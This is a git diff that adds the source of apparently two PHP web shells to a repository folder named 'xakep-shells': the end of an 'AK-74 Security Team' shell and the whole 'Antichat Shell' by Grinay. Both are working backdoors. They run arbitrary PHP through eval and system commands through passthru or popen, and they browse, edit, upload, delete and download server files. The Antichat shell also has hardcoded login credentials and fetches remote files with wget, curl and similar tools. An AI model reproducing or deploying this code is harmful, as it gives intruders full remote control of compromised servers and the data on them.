+}
+BODY {
+	FONT-SIZE: 10pt; FONT-FAMILY: verdana,arial,helvetica; SCROLLBAR-FACE-COLOR: #cccccc; SCROLLBAR-HIGHLIGHT-COLOR: #c10000; SCROLLBAR-SHADOW-COLOR: #c10000; SCROLLBAR-3DLIGHT-COLOR: #830000; SCROLLBAR-ARROW-COLOR: #c10000; SCROLLBAR-TRACK-COLOR: #eeeeee; FONT-FAMILY: verdana; SCROLLBAR-DARKSHADOW-COLOR: #830000; BACKGROUND-COLOR: #dcdcdc; 
+}
+</STYLE>
+<div align="center"><table border=1 bgcolor=#eeeeee cellspacing=0 cellpadding=3 style="border: #C10000 2px solid">
+ <tr>
+  <td colspan=7 align="center">
+   <b><font color=#830000 size=4>.:: :[ AK-74 Security Team Web-shell ]: ::.</font></b>
+  </td>
+ </tr>';
+return $res;
+}
+
+function outputmenu()
+{
+ $res = '';
+ $res .= '<tr>
+  <td colspan=7 align="center">
+   <table border=0 cellspacing=0 cellpadding=0>
+    <tr align="center">
+	 <td width=150>
+	  <a href="'.$xshell.'?act=info">����� ����������</a>
+	 </td>
+	 <td width=150>
+	  <a href="'.$xshell.'?act=filemanager">�������� ��������</a>
+	 </td>
+	 <td width=80>
+	  <a href="'.$xshell.'?act=phpinfo" target="_blank">phpinfo()</a>
+	 </td>
+	 <td width=110>
+	  <a href="'.$xshell.'?act=execute">��������� PHP</a>
+	 </td>
+	 <td width=150>
+	  <a href="'.$xshell.'?act=exesys">��������� �������</a>
+	 </td>
+      </tr>
+   </table>
+  </td>
+ </tr>';
+ return $res;
+}
+
+function outputdown()
+{
+ $res = '';
+ $res .= '</table></div></body></html>';
+ return $res;
+}
+
+function outputfilemanager()
+{
+$res = ''; 
+$number = 0;
+$dirs = $this->getdirs();
+$files = $this->getfiles();
+sort($dirs);
+sort($files);
+
+$res .= '
+ <tr>
+  <td colspan=7 align="center">
+  <font color=#830000> ������� ����������:</font><b><font color=#830000>'.$_SESSION['currentdir'].'</font></b>
+  </td>
+ </tr>
+ <tr align="center">
+  <td width=30>
+   &nbsp;
+  </td>
+  <td width=330>
+   &nbsp;
+  </td>
+  <td width=80><font color=#830000>������,</font> <b><font color=#830000>����</font></b>
+   &nbsp;
+  </td>
+  <td width=120><font color=#830000>
+   ��������� ���������
+   </font>
+  </td>
+  <td width=80 align="center"><font color=#830000>����� �������</font>
+   &nbsp;
+  </td>
+  <td width=30>
+   &nbsp;
+  </td>
+  <td width=30>
+   &nbsp;
+  </td>
+ </tr>';
+
+for ($i = 0; $i < count($dirs); $i++)
+{
+ $res .= '<tr><td><b><font color=#830000>'.(++$number).'</font></b></td><td><b><a href="'.$xshell.'?act=filemanager&dir='.$dirs[$i].'">'.$dirs[$i].'</a></b></td><td>&nbsp;</td><td>&nbsp;</td><td>';
+ $res .= '<a href="'.$xshell.'?act=chmod&file='.$_SESSION['currentdir'].'/'.$dirs[$i].'">'.($this->getpermission($_SESSION['currentdir'].'/'.$dirs[$i])).'</a>';
+ $res .= '</td><td>&nbsp;</td><td><a href="'.$xshell.'?act=filemanager&act3=del&dir='.$_SESSION['currentdir'].'/'.$dirs[$i].'">delete</a></td></tr>';
+}
+for ($i = 0; $i < count($files); $i++)
+{
+ $res .= '<tr><td><b><font color=#830000>'.(++$number).'</font></b></td>';
+ $res .= '<td><a href="'.$xshell.'?act=down&file='.$_SESSION['currentdir'].'/'.$files[$i]['filename'].'">'.$files[$i]['filename'].'</a></td>';
+ $res .= '<td>&nbsp;&nbsp;'.$files[$i]['filesize'].'</td>';
+ $res .= '<td align="center">'.$files[$i]['lastmod'].'</td>';
+ $res .= '<td align="center"><a href="'.$xshell.'?act=chmod&file='.$_SESSION['currentdir'].'/'.$files[$i]['filename'].'">'.($this->getpermission($_SESSION['currentdir'].'/'.$files[$i]['filename'])).'</a></td>';
+ $res .= '<td align="center"><a href="'.$xshell.'?act=edit&file='.$_SESSION['currentdir'].'/'.$files[$i]['filename'].'">edit</a></td>';
+ $res .= '<td align="center"><a href="'.$xshell.'?act=filemanager&act2=del&file='.$_SESSION['currentdir'].'/'.$files[$i]['filename'].'">delete</a></td></tr>';
+}
+$res .= '</table><br>';
+
+$res .= '<table border=0 bgcolor=#eeeeee cellspacing=0 cellpadding=3 style="border: #C10000 2px solid">';
+$res .= '<tr><td align=center><form action="'.$xshell.'?act=filemanager" method="post"><input type="hidden" name="action" value="mkdir"><b><font color=#830000>������� ����������:</b></font> </td><td><input type="text" name="dircreate"><input type="submit" value="�������"></form></td></tr>';
+$res .= '<tr><td align=center><form action="'.$xshell.'?act=filemanager" method="post"><input type="hidden" name="action" value="createfile"><b><font color=#830000>������� ����:</b></font></td><td> <input type="text" name="filecreate"><input type="submit" value="�������"></form></td></tr>';
+$res .= '<tr><td align=center><form enctype="multipart/form-data" action="'.$xshell.'?act=filemanager" method="post"><input type="hidden" name="action" value="uploadfile"><b><font color=#830000>�������� ����:</font></b></td><td><input type="file" name="filename" size="23"> <b><font color=#830000>� ��������� ���</b></font></td><td> <input type="text" name="filename2"><input type="submit" value="�����"></form></td></tr>';
+$res .= '<table border=0 width="700" bgcolor=#eeeeee cellspacing=0 cellpadding=3 style="border: #C10000 1px solid">';
+$res .= '<tr><td align=center><b><font color=#83000>Copyright </font><a href="http://ak74-team.net" target="_blank">AK-74 Security Team<a> <font color=#83000>2005 - '.date("Y").'</font></b></td></tr>';
+return $res;
+}
+
+function outputinfo()
+{
+ $res = '';
+ $res .= '<tr>
+  <td align="center" colspan=7>
+   <b><font color=#83000>����� ���������� � �������</font></b>
+  </td>
+ </tr>
+ <tr>
+  <td colspan=7 align="left"><br>
+   <ol>
+    <b><font color=#830000>1. OS - </font></b><font color=#830000>'.(php_uname()).'</font><br><br>
+    <b><font color=#830000>2.  ������ PHP - </font></b><font color=#830000>'.(phpversion()).'</font><br><br>
+    <b><font color=#830000>3.</font></b><font color=#830000> <b><font color=#830000>User</b></font> - '.( get_current_user()).' <b><font color=#830000>|| User ID</font></b> - '.( getmyuid()).' <b><font color=#830000>|| Group ID</b></font> - '.( getmygid ()).'</font><br><br>
+    <b><font color=#830000>4. Server Software - </font></b><font color=#830000>'.(getenv('SERVER_SOFTWARE')).'</font><br><br>
+    <b><font color=#830000>5. Request Method - </font></b><font color=#830000>'.(getenv('REQUEST_METHOD')).'</font><br><br>
+    <b><font color=#830000>6. Server IP - </font></b><font color=#830000>'.(getenv('SERVER_ADDR')).'</font><br><br>
+    <b><font color=#830000>7. Your IP - </font></b><font color=#830000>'.(getenv('REMOTE_ADDR')).'</font><br><br>
+	<b><font color=#830000>8. X Forwarded For IP - </font></b><font color=#830000>'.(getenv('HTTP_X_FORWARDED_FOR')).'</font><br><br>
+</td>
+ </tr>
+ <table border=0 width="555" bgcolor=#eeeeee cellspacing=0 cellpadding=3 style="border: #C10000 1px solid">
+<tr><td align=center><b><font color=#83000>Copyright </font><a href="http://ak74-team.net" target="_blank">AK-74 Security Team<a> <font color=#83000>2005 - '.date("Y").'</font></b></td></tr>';
+
+ return $res;
+}
+
+function chmodform($file)
+{
+$perms = $this->getpermissionarray($file);
+$res = '';
+$res .= '<form action="'.$xshell.'?act=filemanager" method="post"><input type="hidden" name="action" value="chmod">'
+       .'<input type="hidden" name="file" value="'.$file.'">
+ <tr>
+  <td align="center" colspan=7>
+   <b><font color=#83000>��������� ���� �������</font></b>
+  </td>
+ </tr>
+ <tr>
+  <td colspan=7 align="center">
+   <table border=1 cellspacing=0 cellpadding=0>';
+$res .= '<tr align="center"><td>&nbsp;</td><td>r</td><td>w</td><td>x</td><td>r</td><td>w</td><td>x</td><td>r</td><td>w</td><td>x</td></tr>';
+$res .= '<tr><td><input type="hidden" name="perms0" value="'.$perms[0].'">'.$perms[0].'</td>';
+for ($i = 1; $i <= 9; $i++)
+ $res .= '<td><input type="checkbox" name="perms'.$i.'"'.(($perms[$i] != '-') ? ' checked' : '' ).'></td>';
+$res .= '</tr><tr><td colspan=10 align="right"><input type="submit" value="���������"></td></tr>';
+$res .= '</table></td></tr></form>';
+return $res;
+}
+
+function editfileform($file)
+{
+$fp = fopen($file,'r');
+if (!$fp)
+ return '�������������� �����';
+$res = '';
+$res .= '<form action="'.$xshell.'?act=filemanager" method="post"><input type="hidden" name="action" value="editfile">'
+       .'<input type="hidden" name="file" value="'.$file.'"><tr>
+  <td align="center" colspan=7>
+   <b><font color=#83000>�������������� �����</font></b>
+  </td>
+ </tr>
+ <tr>
+  <td colspan=7 align="center">
+   <table border=1 cellspacing=0 cellpadding=0>';
+ $res .= '<tr><td><textarea rows=25 cols=100 name="filecontent">'.(htmlspecialchars(fread($fp, filesize($file)))).'</textarea></td></tr>';
+ $res .= '<tr><td align="right"><b><font color=#830000>Rename:</font></b> <INPUT TYPE=TEXT NAME=rename size=100 maxlength=9999999 value='.$file.'> - <input type="submit" value="�������������"></td></tr>';
+ $res .= '</table></td></tr></form>';
+ fclose($fp);
+ return $res;
+}
+
+function executeform()
+{
+ $res = '';
+ $res .= '<form action="'.$xshell.'?act=execute" method="post"><input type="hidden" name="action" value="execute">
+ <tr>
+  <td align="center" colspan=7>
+   <b><font color=#83000>���������� PHP-����<br> �������� � �������� PHP ���� ( &lt;? � ?> ) ������ �� �����!</font></b>
+  </td>
+ </tr>
+ <tr>
+  <td colspan=7 align="center">
+   <table border=1 cellspacing=0 cellpadding=0><tr><td><textarea rows=20 cols=80 name="phpcode">';
+ $res .= '</textarea></td></tr><tr><td align="right"><input type="submit" value="���������"></td></tr></table></td></tr>
+ <table border=0 width="555" bgcolor=#eeeeee cellspacing=0 cellpadding=3 style="border: #C10000 1px solid">
+<tr><td align=center><b><font color=#83000>Copyright </font><a href="http://ak74-team.net" target="_blank">AK-74 Security Team<a> <font color=#83000>2005 - '.date("Y").'</font></b></td></tr>';
+ return $res;
+}
+
+function execute()
+{
+echo "<hr>";
+echo "<pre>";
+eval(stripslashes($_POST['phpcode']));
+echo "</pre>";
+echo "<hr>";
+ }
+
+function exesysform()
+{
+ $res = '';
+  $res .= '<form action="'.$xshell.'?act=exesys" method="post"><input type="hidden" name="action" value="exesys">
+ <tr>
+  <td align="center" colspan=7>
+   <b><font color=#83000>Execute system commands!</font></b>
+  </td>
+ </tr>
+ <tr>
+  <td colspan=7 align="center">
+   <table border=1 cellspacing=0 cellpadding=0><tr><td><textarea rows=5 cols=80 name="cmmd">';
+ $res .= '</textarea></td></tr><tr><td align="right"><input type="submit" value="���������"></td></tr></table></td></tr>
+ <table border=0 width="555" bgcolor=#eeeeee cellspacing=0 cellpadding=3 style="border: #C10000 1px solid">
+<tr><td align=center><b><font color=#83000>Copyright </font><a href="http://ak74-team.net" target="_blank">AK-74 Security Team<a> <font color=#83000>2005 - '.date("Y").'</font></b></td></tr>';
+ return $res;
+}
+
+function exesys()
+{
+echo "<hr>";
+echo "<pre>";
+$result = passthru($_POST['cmmd']);
+echo "</pre>";
+echo "<hr>";
+}
+
+function editfile($file)
+{
+if (!empty($_POST['rename'])) {
+rename ($_POST['file'], $_POST['rename']);
+}
+ $fp = fopen($_POST['rename'],'w');
+ if (!$fp)
+  return 0;
+ fwrite($fp, stripslashes($_POST['filecontent']));
+ fclose($fp);
+ return 1;
+}
+ 
+function chmodfile($file)
+{
+ $res = 0;
+ switch ($_POST['perms0'])
+ {
+  case 's':
+   $res = $res | 0xC000;
+  break;
+  case 'l':
+   $res = $res | 0xA000;
+  break;
+  case '-':
+   $res = $res | 0x8000;
+  break;
+  case 'b':
+   $res = $res | 0x6000;
+  break;
+  case 'd':
+   $res = $res | 0x4000;
+  break;
+  case 'c':
+   $res = $res | 0x2000;
+  break;
+  case 'p':
+   $res = $res | 0x1000;
+  break;
+  case 'u':
+
+  break;
+ }
+if (isset($_POST['perms1']))
+ $res = $res | 0x0100;
+if (isset($_POST['perms2']))
+ $res = $res | 0x0080;
+if (isset($_POST['perms3']))
+ $res = $res | 0x0040;
+
+if (isset($_POST['perms4']))
+ $res = $res | 0x0020;
+if (isset($_POST['perms5']))
+ $res = $res | 0x0010;
+if (isset($_POST['perms6']))
+ $res = $res | 0x0008;
+
+if (isset($_POST['perms7']))
+ $res = $res | 0x0004;
+if (isset($_POST['perms8']))
+ $res = $res | 0x0002;
+if (isset($_POST['perms9']))
+ $res = $res | 0x0001;
+echo substr(sprintf('%o', $res), -4);
+return chmod($file,intval(substr(sprintf('%o', $res), -4),8));
+
+}
+
+function downloadfile($file)
+{
+header ("Content-Type: application/octet-stream");
+header ("Content-Length: " . filesize($file));
+header ("Content-Disposition: attachment; filename=$file");
+readfile($file);
+die();
+}
+
+function createdir()
+{
+ if (!empty($_POST['dircreate']))
+  if (mkdir($_SESSION['currentdir'].'/'.$_POST['dircreate']))
+   return '���������� �������!';
+   
+ return '������ ��� �������� ����������';
+}
+
+function createfile()
+{
+ if (!empty($_POST['filecreate']))
+ {
+  if (file_exists($_SESSION['currentdir'].'/'.$_POST['filecreate']))
+   return '���� ��� ����������';
+  $fp = fopen($_SESSION['currentdir'].'/'.$_POST['filecreate'],"w");
+  if ($fp)
+  {
+   fclose($fp);
+   return '���� ������!';
+  }
+ }
+   
+ return '������ ��� �������� �����';
+}
+
+function uploadfile()
+{
+ if ($_FILES['filename']['error'] != 0)
+  return '121212';
+ $_POST['filename2'] = trim($_POST['filename2']);
+ if (empty($_POST['filename2']))
+  $_POST['filename2'] = $_FILES['filename']['name'];
+ if (!copy($_FILES['filename']['tmp_name'],$_SESSION['currentdir'].'/'.$_POST['filename2']))
+  if (!move_uploaded_file($_FILES['filename']['tmp_name'],$_SESSION['currentdir'].'/'.$_POST['filename2']))
+   return '������� ����� �� ���������...';
+ return '������� ����� ����������� �������!';
+}
+
+}
+ $shell = new shell();
+ $timestart = $shell->getmicrotime();
+ $content = '';
+ if (!isset($_SESSION['currentdir']))
+  $_SESSION['currentdir'] = str_replace('\\','/',$_SERVER['DOCUMENT_ROOT']);
+ if (isset($_GET['dir']))
+ {
+  if (opendir(realpath($_SESSION['currentdir'].'/'.$_GET['dir'])))
+   $_SESSION['currentdir'] = realpath($_SESSION['currentdir'].'/'.$_GET['dir']);
+  Header("Location: $xshell?act=filemanager");
+ }
+
+ $_SESSION['currentdir'] = str_replace('\\','/',$_SESSION['currentdir']);
+ if (substr($_SESSION['currentdir'],-1,1) == '/')
+  $_SESSION['currentdir'] = substr($_SESSION['currentdir'],0,-1);
+
+ switch ($_POST['action'])
+ {
+  case 'chmod':
+   if($shell->chmodfile($_POST['file']))
+    $content .= '����� ���� ��������� �������';
+  break;
+  
+  case 'editfile':
+   if ($shell->editfile($_POST['file']))
+    $content .= '�������������� ��������� �������';
+  break;
+  
+  case 'execute':
+   $shell->execute();
+  break;
+  
+  case 'exesys':
+   $shell->exesys();
+  break;
+  
+  case 'mkdir':
+   $content .= $shell->createdir();
+  break;
+  
+  case 'createfile':
+   $content .= $shell->createfile();
+  break;
+  
+  case 'uploadfile':
+   $content .= $shell->uploadfile();
+  break;
+ }
+ $content .= $shell->outputhead();
+ $content .= $shell->outputmenu();
+ 
+ switch ($_GET['act'])
+ {
+  case 'edit':
+   $content .= $shell->editfileform($_GET['file']);
+  break;
+  
+  case 'chmod':
+   $content .= $shell->chmodform($_GET['file']);
+  break;
+  
+  case 'down':
+   $content .= $shell->downloadfile($_GET['file']);
+  break;
+  
+  case 'filemanager':
+  if ($_GET['act2'] == 'del')
+    $content .= $shell->removefile();
+    $content .= $shell->outputfilemanager();
+  if ($_GET['act3'] == 'del')
+    $content .= $shell->removedir();
+  break;
+  
+  case 'phpinfo':
+   phpinfo();
+   die();
+  break;
+  
+  case 'info':
+   $content .= $shell->outputinfo();
+  break;
+  
+  case 'execute':
+   $content .= $shell->executeform();
+  break;
+  
+  case 'exesys':
+   $content .= $shell->exesysform();
+  break;
+ }
+ 
+ $content .= $shell->outputdown();
+ 
+ echo $content;
+ echo '<center>����� ���������: '.($shell->getmicrotime()-$timestart).'</center>';
+?>
\ No newline at end of file
diff --git a/xakep-shells/PHP/antichat.php.php.txt b/xakep-shells/PHP/antichat.php.php.txt
new file mode 100644
index 0000000..01702a8
--- /dev/null
+++ b/xakep-shells/PHP/antichat.php.php.txt
@@ -0,0 +1,366 @@
+<?php
+session_start();
+error_reporting(0);
+set_time_limit(9999999);
+$login='antichat';
+$password='antichat';
+$auth=1;
+$version='version 1.5 by Grinay';
+$msgnotice='';
+$style='<STYLE>
+BODY{
+  background-color: #2B2F34;
+  color: #C1C1C7;
+  font: 8pt verdana, geneva, lucida, \'lucida grande\', arial, helvetica, sans-serif;
+  MARGIN-TOP: 0px;
+  MARGIN-BOTTOM: 0px;
+  MARGIN-LEFT: 0px;
+  MARGIN-RIGHT: 0px;
+  margin:0;
+  padding:0;
+  scrollbar-face-color: #336600;
+  scrollbar-shadow-color: #333333;
+  scrollbar-highlight-color: #333333;
+  scrollbar-3dlight-color: #333333;
+  scrollbar-darkshadow-color: #333333;
+  scrollbar-track-color: #333333;
+  scrollbar-arrow-color: #333333;
+}
+input{
+  background-color: #336600;
+  font-size: 8pt;
+  color: #FFFFFF;
+  font-family: Tahoma;
+  border: 1 solid #666666;
+}
+select{
+  background-color: #336600;
+  font-size: 8pt;
+  color: #FFFFFF;
+  font-family: Tahoma;
+  border: 1 solid #666666;
+}
+textarea{
+  background-color: #333333;
+  font-size: 8pt;
+  color: #FFFFFF;
+  font-family: Tahoma;
+  border: 1 solid #666666;
+}
+a:link{
+  
+  color: #B9B9BD;
+  text-decoration: none;
+  font-size: 8pt;
+}
+a:visited{
+  color: #B9B9BD;
+  text-decoration: none;
+  font-size: 8pt;
+}
+a:hover, a:active{
+  width: 100%;
+  background-color: #A8A8AD;
+  
+
+  color: #E7E7EB;
+  text-decoration: none;
+  font-size: 8pt;
+}
+td, th, p, li{
+  font: 8pt verdana, geneva, lucida, \'lucida grande\', arial, helvetica, sans-serif;
+  border-color:black;
+}
+</style>';
+$header='<html><head><title>'.getenv("HTTP_HOST").' - Antichat Shell</title><meta http-equiv="Content-Type" content="text/html; charset=windows-1251">'.$style.'</head><BODY leftMargin=0 topMargin=0 rightMargin=0 marginheight=0 marginwidth=0>';
+$footer='</body></html>';
+
+//error parser
+$filext="File already exists.";
+$uploadok="File was successfully uploaded.";
+$dircrt="Dir is created.";
+$dircrterr="Don't create dir.";
+$dirnf="Dir not found.";
+$empty="Directory not empty or access denide.";
+$deletefileok="File deleted";
+$deletedirok="Dir deleted";
+//end error parser
+
+//auth
+if(@$_POST['action']=="exit")unset($_SESSION['an']);
+if($auth==1){if(@$_POST['login']==$login && @$_POST['password']==$password)$_SESSION['an']=1;}else $_SESSION['an']='1';
+if(@$_SESSION['an']==0){
+echo $header;
+echo '<center><table><form method="POST"><tr><td>Login:</td><td><input type="text" name="login" value=""></td></tr><tr><td>Password:</td><td><input type="password" name="password" value=""></td></tr><tr><td></td><td><input type="submit" value="Enter"></td></tr></form></table></center>';
+echo $footer;
+exit;}
+//end auth
+
+function createdir($dir){if(@mkdir($dir))echo $GLOBALS['dircrt']." "; else echo $GLOBALS['dircrterr']." ";}
+
+
+
+if($_SESSION['action']=="")$_SESSION['action']="viewer";
+if(@$_POST['action']!="" )$_SESSION['action']=$_POST['action'];$action=$_SESSION['action'];
+if(@$_POST['dir']!="")$_SESSION['dir']=$_POST['dir'];$dir=$_SESSION['dir'];
+
+$dir=chdir($dir);
+$dir=getcwd()."/";
+$dir=str_replace("\\","/",$dir);
+
+
+
+
+
+
+//crdir
+
+
+if(@$_POST['file']!=""){$file=$_SESSION['file']=$_POST['file'];}else {$file=$_SESSION['file']="";}
+  
+//Current type OS
+if(strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') $win=1; else $win=0;
+
+
+
+ 
+ 
+ 
+
+//downloader
+if($action=="download"){ 
+header('Content-Length:'.filesize($file).'');
+header('Content-Type: application/octet-stream');
+header('Content-Disposition: attachment; filename="'.$file.'"');
+readfile($file);
+}
+//end downloader
+
+//delete file
+if($action=="delete"){ 
+if(unlink($file)) $msgnotice.=$deletefileok;
+}
+//end delete
+
+//delete dir
+if($action=="deletedir"){ 
+if(!rmdir($file)) $msgnotice.=$GLOBALS['empty'];else $msgnotice.=$deletedirok;
+
+}
+//end delete
+?>
+
+<? echo $header;?> 
+<!--content-->
+<table width="100%" bgcolor="#336600" align="right" colspan="2" border="0" cellspacing="0" cellpadding="0"><tr><td>
+<table><tr>
+<td><a href="#" onclick="document.reqs.action.value='shell'; document.reqs.submit();">| Shell </a></td>
+<td><a href="#" onclick="document.reqs.action.value='viewer'; document.reqs.submit();">| Viewer</a></td>
+<td><a href="#" onclick="document.reqs.action.value='editor'; document.reqs.submit();">| Editor</a></td>
+<td><a href="#" onclick="document.reqs.action.value='upload'; document.reqs.submit();">| Upload</a></td>
+<td><a href="#" onclick="document.reqs.action.value='phpeval'; document.reqs.submit();">| Php Eval</a></td>
+<td><a href="#" onclick="document.reqs.action.value='exit'; document.reqs.submit();">| EXIT |</a></td>
+<td><a href="#" onclick="history.back();"> <-back |</a></td>
+<td><a href="#" onclick="history.forward();"> forward->|</a></td>
+
+</tr></table></td></tr></table><br>
+<form name='reqs' method='POST'>
+<input name='action' type='hidden' value=''>
+<input name='dir' type='hidden' value=''>
+<input name='file' type='hidden' value=''>
+</form>
+<table style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1>
+<tr><td width="100%" valign="top">
+<!--end one content-->
+<?php if(@$msgnotice!="") echo $msgnotice;?>
+<?
+
+//shell
+function shell($cmd){
+if (!empty($cmd)){
+  $fp = popen($cmd,"r");
+  {
+    $result = "";
+    while(!feof($fp)){$result.=fread($fp,1024);}
+    pclose($fp);
+  }
+  $ret = $result;
+  $ret = convert_cyr_string($ret,"d","w");
+}
+return $ret;}
+
+if($action=="shell"){
+echo "<form method=\"POST\">
+<input type=\"hidden\" name=\"action\" value=\"shell\">
+<textarea name=\"command\" rows=\"5\" cols=\"150\">".@$_POST['command']."</textarea><br>
+<textarea readonly rows=\"15\" cols=\"150\">".@htmlspecialchars(shell($_POST['command']))."</textarea><br>
+<input type=\"submit\" value=\"execute\"></form>";}
+//end shell
+
+
+//viewer FS
+function perms($file) 
+{ 
+  $perms = fileperms($file);
+  if (($perms & 0xC000) == 0xC000) {$info = 's';} 
+  elseif (($perms & 0xA000) == 0xA000) {$info = 'l';} 
+  elseif (($perms & 0x8000) == 0x8000) {$info = '-';} 
+  elseif (($perms & 0x6000) == 0x6000) {$info = 'b';} 
+  elseif (($perms & 0x4000) == 0x4000) {$info = 'd';} 
+  elseif (($perms & 0x2000) == 0x2000) {$info = 'c';} 
+  elseif (($perms & 0x1000) == 0x1000) {$info = 'p';} 
+  else {$info = 'u';}
+  $info .= (($perms & 0x0100) ? 'r' : '-');
+  $info .= (($perms & 0x0080) ? 'w' : '-');
+  $info .= (($perms & 0x0040) ?(($perms & 0x0800) ? 's' : 'x' ) :(($perms & 0x0800) ? 'S' : '-'));
+  $info .= (($perms & 0x0020) ? 'r' : '-');
+  $info .= (($perms & 0x0010) ? 'w' : '-');
+  $info .= (($perms & 0x0008) ?(($perms & 0x0400) ? 's' : 'x' ) :(($perms & 0x0400) ? 'S' : '-'));
+  $info .= (($perms & 0x0004) ? 'r' : '-');
+  $info .= (($perms & 0x0002) ? 'w' : '-');
+  $info .= (($perms & 0x0001) ?(($perms & 0x0200) ? 't' : 'x' ) :(($perms & 0x0200) ? 'T' : '-'));
+  return $info;
+} 
+
+function view_size($size)
+{
+ if($size >= 1073741824) {$size = @round($size / 1073741824 * 100) / 100 . " GB";}
+ elseif($size >= 1048576) {$size = @round($size / 1048576 * 100) / 100 . " MB";}
+ elseif($size >= 1024) {$size = @round($size / 1024 * 100) / 100 . " KB";}
+ else {$size = $size . " B";}
+ return $size;
+}
+
+function scandire($dir){
+
+
+		
+echo "<table cellSpacing=0 border=1 style=\"border-color:black;\" cellPadding=0 width=\"100%\">";
+echo "<tr><td><form method=POST>Open directory:<input type=text name=dir value=\"".$dir."\" size=50><input type=submit value=\"GO\"></form></td></tr>";
+
+if (is_dir($dir)) {
+    if (@$dh = opendir($dir)) {
+        while (($file = readdir($dh)) !== false) {
+		  if(filetype($dir . $file)=="dir") $dire[]=$file;
+		  if(filetype($dir . $file)=="file")$files[]=$file;
+		}
+		closedir($dh);
+		@sort($dire);
+		@sort($files);
+
+
+if ($GLOBALS['win']==1) {
+echo "<tr><td>Select drive:";
+for ($j=ord('C'); $j<=ord('Z'); $j++) 
+ if (@$dh = opendir(chr($j).":/"))
+ echo '<a href="#" onclick="document.reqs.action.value=\'viewer\'; document.reqs.dir.value=\''.chr($j).':/\'; document.reqs.submit();"> '.chr($j).'<a/>';
+ echo "</td></tr>";
+}
+echo "<tr><td>OS: ".@php_uname()."</td></tr>
+<tr><td>name dirs and files</td><td>type</td><td>size</td><td>permission</td><td>options</td></tr>";
+for($i=0;$i<count($dire);$i++) {
+$link=$dir.$dire[$i];
+  echo '<tr><td><a href="#" onclick="document.reqs.action.value=\'viewer\'; document.reqs.dir.value=\''.$link.'\'; document.reqs.submit();">'.$dire[$i].'<a/></td><td>dir</td><td></td><td>'.perms($link).'</td><td><a href="#" onclick="document.reqs.action.value=\'deletedir\'; document.reqs.file.value=\''.$link.'\'; document.reqs.submit();" title="Delete this file">X</a></td></tr>';  
+  }
+for($i=0;$i<count($files);$i++) {
+$linkfile=$dir.$files[$i];
+echo '<tr><td><a href="#" onclick="document.reqs.action.value=\'editor\'; document.reqs.file.value=\''.$linkfile.'\'; document.reqs.submit();">'.$files[$i].'</a><br></td><td>file</td><td>'.view_size(filesize($linkfile)).'</td>
+<td>'.perms($linkfile).'</td>
+<td>
+<a href="#" onclick="document.reqs.action.value=\'download\'; document.reqs.file.value=\''.$linkfile.'\'; document.reqs.submit();" title="Download">D</a>
+<a href="#" onclick="document.reqs.action.value=\'editor\'; document.reqs.file.value=\''.$linkfile.'\'; document.reqs.submit();" title="Edit">E</a>
+<a href="#" onclick="document.reqs.action.value=\'delete\'; document.reqs.file.value=\''.$linkfile.'\'; document.reqs.submit();" title="Delete this file">X</a></td>
+</tr>'; 
+}
+echo "</table>";
+}}}
+
+if($action=="viewer"){
+scandire($dir);
+}
+//end viewer FS
+
+//editros
+if($action=="editor"){  
+  function writef($file,$data){
+  $fp = fopen($file,"w+");
+  fwrite($fp,$data);
+  fclose($fp);
+  }
+  function readf($file){
+  if(!$le = fopen($file, "r")) $contents="Can't open file, permission denide"; else {
+  $contents = fread($le, filesize($file));
+  fclose($le);}
+  return htmlspecialchars($contents);
+  }
+if(@$_POST['save'])writef($file,$_POST['data']);
+echo "<form method=\"POST\">
+<input type=\"hidden\" name=\"action\" value=\"editor\">
+<input type=\"hidden\" name=\"file\" value=\"".$file."\">
+<textarea name=\"data\" rows=\"40\" cols=\"180\">".@readf($file)."</textarea><br>
+<input type=\"submit\" name=\"save\" value=\"save\"><input type=\"reset\" value=\"reset\"></form>";
+}
+//end editors
+
+//upload
+if($action=="upload"){
+  if(@$_POST['dirupload']!="") $dirupload=$_POST['dirupload'];else $dirupload=$dir;
+  $form_win="<tr><td><form method=POST enctype=multipart/form-data>Upload to dir:<input type=text name=dirupload value=\"".$dirupload."\" size=50></tr></td><tr><td>New file name:<input type=text name=filename></td></tr><tr><td><input type=file name=file><input type=submit name=uploadloc value='Upload local file'></td></tr>";
+  if($GLOBALS['win']==1)echo $form_win;
+  if($GLOBALS['win']==0){
+    echo $form_win;
+	echo '<tr><td><select size=\"1\" name=\"with\"><option value=\"wget\">wget</option><option value=\"fetch\">fetch</option><option value=\"lynx\">lynx</option><option value=\"links\">links</option><option value=\"curl\">curl</option><option value=\"GET\">GET</option></select>File addres:<input type=text name=urldown>
+<input type=submit name=upload value=Upload></form></td></tr>';	
+}
+
+if(@$_POST['uploadloc']){
+if(@$_POST['filename']=="") $uploadfile = $dirupload.basename($_FILES['file']['name']); else 
+$uploadfile = $dirupload."/".$_POST['filename'];
+
+if(!file_exists($dirupload)){createdir($dirupload);}
+if(file_exists($uploadfile))echo $GLOBALS['filext']; 
+elseif (move_uploaded_file($_FILES['file']['tmp_name'], $uploadfile)) 
+echo $GLOBALS['uploadok'];
+}
+
+if(@$_POST['upload']){
+    if (!empty($_POST['with']) && !empty($_POST['urldown']) && !empty($_POST['filename']))
+	switch($_POST['with'])
+	{
+	  case wget:
+	  shell(which('wget')." ".$_POST['urldown']." -O ".$_POST['filename']."");
+	  break;
+ 	  case fetch:
+ 	  shell(which('fetch')." -o ".$_POST['filename']." -p ".$_POST['urldown']."");
+ 	  break;
+ 	  case lynx:
+ 	  shell(which('lynx')." -source ".$_POST['urldown']." > ".$_POST['filename']."");
+ 	  break;
+ 	  case links:
+ 	  shell(which('links')." -source ".$_POST['urldown']." > ".$_POST['filename']."");
+ 	  break;
+ 	  case GET:
+ 	  shell(which('GET')." ".$_POST['urldown']." > ".$_POST['filename']."");
+ 	  break;
+ 	  case curl:
+ 	  shell(which('curl')." ".$_POST['urldown']." -o ".$_POST['filename']."");
+ 	  break;
+	 }
+	}
+  
+}
+//end upload section
+
+
+if($action=="phpeval"){
+ echo "
+<form method=\"POST\">
+ <input type=\"hidden\" name=\"action\" value=\"phpheval\">
+ &lt;?php<br>
+<textarea name=\"phpev\" rows=\"5\" cols=\"150\">".@$_POST['phpev']."</textarea><br>
+?><br>
+<input type=\"submit\" value=\"execute\"></form>";} 
+if(@$_POST['phpev']!=""){echo eval($_POST['phpev']);}
+?>
